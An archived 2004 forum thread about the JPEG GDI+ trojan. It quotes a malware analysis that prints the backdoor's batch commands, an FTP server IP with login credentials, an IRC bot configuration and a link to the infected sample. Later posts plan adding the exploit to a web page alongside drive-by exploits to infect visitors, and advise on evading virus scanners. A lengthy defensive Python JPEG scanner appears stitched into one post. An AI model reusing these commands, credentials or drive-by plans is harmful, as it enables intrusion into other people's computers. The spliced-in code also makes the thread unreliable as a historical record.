Full Version: VIRUS: JPG Virus Sept 28th 04
alch
Further information can be found here

JPEG GDI+ Trojan unleashed


Beware of any emails you receive that may contain a URL or attached image.

My personal choice of Virus Scanner
Pure
Yeah, this exploit is a problem that is going to cause some XP users a lot of grief.

The trojan is just the tip of the iceberg and is only one of many exploit scripts out there at the moment; once M$ patch it up I'll release some exploit code for those interested.
alch
More information for you stoners yet part-time 'puter buffs..
From an easynews txt file


jpeg virus in the wild?!

UPDATE: To check to see if you have been infected by this virus, look for a directory
named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it.

UPDATE: We have packet logs at http://easynews.com/virus/ THIS VIRUS IS NASTY!

If you don't know what a jpeg virus is, check out:
http://news.google.com/news?q=jpeg+virus

Swany and I wrote a quick and nasty script to scan every jpeg that comes into Easynews.com.. It paged
my cell phone at 6:47pm PDT on 9/26/2004 for the first hit, and 7:52pm PDT on 9/26/2004 for
the second hit.

Once this JPEG overflowed GDI+, it phoned home, connected to an ftp site and downloaded
almost 2 megs of stuff. It installs a trojan that installs itself as a service.

It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."

It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users were logged in!)

it downloads these files:

-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe

and executes 'execute.bat', which looks like:

regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server

it also installs an irc client with this config info:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d

Here is the data:

The isolated file is here (BE CAREFUL - DON'T SUE ME FOR DAMAGE, I'LL COUNTER-SUE!):

http://easynews.com/virus/virus-jpeg.zip <-- DO NOT CLICK HERE UNLESS YOU ARE WILLING TO SUFFER MANY CONSEQUENCES.

md5: b7e7a5703a722558b6a170be5c43b90d
crc32:a3e0f71e
size: 4098 bytes

Here is the first message header:

Path: news.easynews.com!core-easynews!newsfeed2.easynews.com!newsfeed1.easynews.com!easynews.com!easynews!cyclone1.gnilink.net!gnilink.net!wn14feed!worldnet.att.net!204.71.34.3!newsfeed.cwix.com!newsfeed.icl.net!newsfeed.wirehub.nl!news.cambrium.nl!news.cambrium.nl!news2.euro.net!62.253.162.219.MISMATCH!news-in.ntli.net!newsrout1-win.ntli.net!ntli.net!newspeer1-win.ntli.net!newsfe3-win.ntli.net.POSTED!53ab2750!not-for-mail
From: Power-Poster@power-post.org (Power-Post 2000)
Sender: Power-Poster@power-post.org
Newsgroups: alt.binaries.multimedia.erotica.transsexuals,alt.binaries.pictures.erotica.transexual,alt.binaries.pictures.erotica.transexual.action,alt.binaries.pictures.erotica.transsexual
Subject: (Shemale-loves it up the ass.jpg (1/1)] [1/1] - Shemale loves it up the ass
X-Newsposter: NNTP POWER-POST 2000 (Build 24c) - net-toys.8k.com
Lines: 96
Message-ID: <A_J5d.105$24.101@newsfe3-win.ntli.net>
Date: Mon, 27 Sep 2004 01:25:52 GMT
NNTP-Posting-Host: 82.1.163.241
X-Trace: newsfe3-win.ntli.net 1096248352 82.1.163.241 (Mon, 27 Sep 2004 02:25:52 BST)
NNTP-Posting-Date: Mon, 27 Sep 2004 02:25:52 BST
Organization: NTL
Xref: core-easynews alt.binaries.multimedia.erotica.transsexuals:1756301 alt.binaries.pictures.erotica.transexual:393069 alt.binaries.pictures.erotica.transexual.action:2666691 alt.binaries.pictures.erotica.transsexual:207823
X-Received-Date: Sun, 26 Sep 2004 19:19:51 MST (news.easynews.com)

And here is the second header:

Path: news.easynews.com!core-easynews!newsfeed2.easynews.com!newsfeed1.easynews.com!easynews.com!easynews!bigfeed2.bellsouth.net!bigfeed.bellsouth.net!news.bellsouth.net!news-in.ntli.net!newsrout1-win.ntli.net!ntli.net!newspeer1-win.ntli.net!newsfe2-win.ntli.net.POSTED!53ab2750!not-for-mail
From: Power-Poster@power-post.org (Power-Post 2000)
Sender: Power-Poster@power-post.org
Newsgroups: alt.binaries.erotica.beanie-babies,alt.binaries.erotica.breasts,alt.binaries.erotica.christy-canyon,alt.binaries.erotica.fetish,alt.binaries.erotica.original.sin,alt.binaries.erotica.pornstar
Subject: (Beautiful 20yr old - double penetration.jpg (1/1)] [1/1] - 20yr old double penetration
X-Newsposter: NNTP POWER-POST 2000 (Build 24c) - net-toys.8k.com
Lines: 96
Message-ID: <S2L5d.341$wW2.317@newsfe2-win.ntli.net>
Date: Mon, 27 Sep 2004 02:38:42 GMT
NNTP-Posting-Host: 82.1.163.241
X-Trace: newsfe2-win.ntli.net 1096252722 82.1.163.241 (Mon, 27 Sep 2004 03:38:42 BST)
NNTP-Posting-Date: Mon, 27 Sep 2004 03:38:42 BST
Organization: NTL
Xref: core-easynews alt.binaries.erotica.beanie-babies:884786 alt.binaries.erotica.breasts:1112072 alt.binaries.erotica.christy-canyon:368690 alt.binaries.erotica.fetish:1386267 alt.binaries.erotica.original.sin:1793 alt.binaries.erotica.pornstar:831729
X-Received-Date: Sun, 26 Sep 2004 20:12:42 MST (news.easynews.com)

Here is a 'djpeg' output:

djpeg -debug b7e7a5703a722558b6a170be5c43b90d0a3e0f71e.jpg > /dev/null
Independent JPEG Group's DJPEG, version 6b 27-Mar-1998
Copyright © 1998, Thomas G. Lane
Start of Image
JFIF APP0 marker: version 1.02, density 100x100 0
APP12, length 15:
Ducky\000\001\000\004\000\000\000
\000\000
Adobe APP14 marker: version 100, flags 0xc000 0x0000, transform 1
Comment, length -1:

Corrupt JPEG data: 130 extraneous bytes before marker 0xc0
Start Of Frame 0xc0: width=555, height=857, components=3
Component 1: 2hx2v q=0
Component 2: 1hx1v q=1
Component 3: 1hx1v q=1
Define Huffman Table 0x00
Define Huffman Table 0x01
Define Huffman Table 0x10
Define Huffman Table 0x11
Start Of Scan: 3 components
Component 1: dc=0 ac=0
Component 2: dc=1 ac=1
Component 3: dc=1 ac=1
Ss=0, Se=63, Ah=0, Al=0
Quantization table 0x00 was not defined

Here is a 'strings' output:

JFIF
Ducky
Adobe
p&.>55555>
DDDDDDDDDDDDD
&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
"2BR
j0_R
}tL#
xgTYdG
<kF`
k>iv
k$bAa
cspkkj
nXc|3
Y9cY
.IBmRp9b
4$XXXX
mmmmm
emDXOR


-- godzilla


Edit #1:
---------
The Bold after the link containing the zip file of the infected jpeg

Edit #2:
----------
Geekier than j00.. Pure..
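The djpeg trace in the post above shows the actual trigger in one line: "Comment, length -1". A JPEG segment's 16-bit length field counts its own two bytes, so a COM segment with a length of 0 or 1 is invalid, and GDI+ computed `length - 2` on it without a check, turning the copy size into a huge unsigned value (that is the MS04-028 bug). djpeg instead printed -1, skipped nothing, and resynchronised at the next marker, which is where its "130 extraneous bytes before marker 0xc0" line comes from. The walker below reproduces that audit so a file can be checked without handing it to a decoder. It is an added example and not code from the post or from Easynews; the two sample files it ships with are hand-built byte strings (a benign one and one with the bad COM length), not the Easynews sample, and the SOF0 values simply mirror the dimensions and sampling factors the djpeg output reports.

```python
"""Added example: walk a JPEG's header segments and flag a length field
below 2, the condition behind the MS04-028 GDI+ overflow.

Each segment after SOI is  FF <marker> <u16 length> <payload>  with the
big-endian length including its own two bytes. Nothing is copied here: a
bad length is recorded, only the two length bytes are skipped, and the
walk resyncs at the next marker the way libjpeg does (hence its
"extraneous bytes before marker" message)."""
import struct
import sys

SOI, EOI, SOS, COM, TEM = 0xD8, 0xD9, 0xDA, 0xFE, 0x01
STANDALONE = {SOI, EOI, TEM} | set(range(0xD0, 0xD8))  # markers that carry no length field


def _next_marker(data, pos):
    """Scan forward from pos for the next FF xx marker.

    Returns (marker_offset, marker_byte, pos_after_marker, bytes_skipped) or
    None at end of data. FF 00 is a stuffed data byte and FF FF a fill byte;
    neither is a marker, so both count as skipped (extraneous) bytes."""
    skipped = 0
    while pos < len(data):
        if data[pos] != 0xFF:
            skipped += 1
            pos += 1
            continue
        q = pos
        while q < len(data) and data[q] == 0xFF:
            q += 1
        if q < len(data) and data[q] != 0x00:
            return pos, data[q], q + 1, skipped
        skipped += (q - pos) + 1        # FF run ending in 00 or at EOF: not a marker
        pos = q + 1
    return None


def scan(data):
    """Audit the marker segments up to Start-of-Scan.

    Returns a list of findings (dicts with offset/marker/reason and, for a
    bad length, the raw 'length' field); an empty list means every header
    segment carried a sane length."""
    if data[:2] != bytes([0xFF, SOI]):
        raise ValueError("not a JPEG: no SOI marker")
    findings = []
    pos = 2
    while True:
        hit = _next_marker(data, pos)
        if hit is None:
            findings.append({"offset": len(data), "marker": None,
                             "reason": "ran off the end of the file before SOS/EOI"})
            return findings
        off, marker, pos, skipped = hit
        if skipped:
            findings.append({"offset": off, "marker": marker,
                             "reason": f"{skipped} extraneous bytes before marker 0x{marker:02x}"})
        if marker in STANDALONE:
            if marker == EOI:
                return findings
            continue
        if pos + 2 > len(data):
            findings.append({"offset": off, "marker": marker, "reason": "truncated length field"})
            return findings
        length = struct.unpack(">H", data[pos:pos + 2])[0]
        if length < 2:
            findings.append({"offset": off, "marker": marker, "length": length,
                             "reason": f"length field {length} < 2: a naive `length - 2` underflows (MS04-028 pattern)"})
            pos += 2          # skip only the length bytes, then resync at the next marker
            continue
        if marker == SOS:
            return findings   # entropy-coded data follows; only the headers are audited
        pos += length         # the length covers itself plus the payload


def has_underflow_length(data):
    """True if any header segment carries a length field of 0 or 1."""
    return any(f.get("length", 2) < 2 for f in scan(data))


# --- constructed sample files (hand-built here, not the Easynews sample) ---
def _seg(marker, payload):
    """One well-formed segment: FF marker, length (including itself), payload."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload

_APP0 = _seg(0xE0, b"JFIF\x00\x01\x02\x00\x00\x64\x00\x64\x00\x00")  # JFIF 1.02, density 100x100
# Baseline SOF0 mirroring the djpeg trace: 8-bit, 857 lines x 555 samples, components
# sampled 2x2 / 1x1 / 1x1. DQT/DHT are omitted since the image data is never decoded.
_SOF0 = _seg(0xC0, b"\x08" + struct.pack(">HH", 857, 555) + b"\x03"
             + b"\x01\x22\x00" + b"\x02\x11\x01" + b"\x03\x11\x01")
_SOS = _seg(SOS, b"\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00")
_TAIL = _SOF0 + _SOS + b"\x00" * 4 + bytes([0xFF, EOI])

BENIGN = bytes([0xFF, SOI]) + _APP0 + _seg(COM, b"hand-built comment") + _TAIL
# Same layout, but the COM length field is 1 (what djpeg reported as "length -1");
# the 130 filler bytes stand in for whatever an attacker places after that field.
MALFORMED = bytes([0xFF, SOI]) + _APP0 + bytes([0xFF, COM, 0x00, 0x01]) + b"A" * 130 + _TAIL

if __name__ == "__main__":
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [("BENIGN", BENIGN), ("MALFORMED", MALFORMED)]
    for name, blob in targets:
        print(name, "suspicious" if has_underflow_length(blob) else "ok")
        for f in scan(blob):
            print(f"  offset {f['offset']}: {f['reason']}")
```

Run it with file paths as arguments to audit real files; with no arguments it checks the two constructed samples, reporting the benign one as clean and the malformed one with the bad COM length at offset 20 followed by "130 extraneous bytes before marker 0xc0", the same pair of observations djpeg made on the real sample. Note that stopping at SOS is deliberate: the overflow lives in the header segments, and the entropy-coded data after SOS legitimately contains FF 00 byte stuffing and restart markers that are not worth second-guessing here.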
sirino
Hmmm nice. Maybe I'll use it :P
Pure
Hardly worth it now that all mainstream scanners would have been updated to protect against it already.
sirino
Quoting Pure (Dec 13 2004, 09:24 AM):
> hardly worth it now that all mainstream scanners would have been updated to protect against it already

Yeah, but it could be added to a page that already has the scrollbar installer and drag and drop exploits, improving the chances that the visitor downloads the desired proggie.
Pure
Most computers these days would pick that up as a malicious script and stop it from loading, particularly considering you're using already solved and patched exploits and/or updated virus definitions.
sirino
Quoting Pure (Dec 13 2004, 03:58 PM):
> Most computers these days would pick that up as a malicious script and stop it from loading, particularly considering you're using already solved and patched exploits and/or updated virus definitions.

How many average home users have a quality virus scanner AND update weekly AND have it protect in real time? The answer is very few.
Pure
I am not sure what you mean by a quality virus scanner, but just about all the mainstream virus software has both web and email protection against viruses and malicious scripts; they also tend to bug the hell out of you to update pretty regularly these days.

If you're really wanting to get away with a successful infection, you need to keep up with the methods/technology that the virus coders and the people who spend time reverse engineering software are using, because generally speaking the viruses that are released onto the public, that you hear about on the news and that your scanners update you against, are in all honesty fairly mild in the amount of damage they do compared to what a virus has the potential of.

Publicly available exploits, and even more so in the case of viruses, are usually a few months if not up to a year behind the information that is available to people who work themselves to find the holes or take it upon themselves to code their own "piece of art".

My suggestion, if you're really interested in it, is to get back to the basics of programming; languages like asm16, asm32 and binary are the basis of viruses and also of course reverse engineering. It is also handy to have a spare machine disconnected from the outside world, for safety reasons, to do all your work on.

Something else that is commonly overlooked is the fact that virus coding is 100% legal in most countries, including Australia, provided they are for experimental and testing purposes; however, if they could prove you intended to use or had used it on a machine other than your own, then the virus would be classed as a "weapon of terrorism".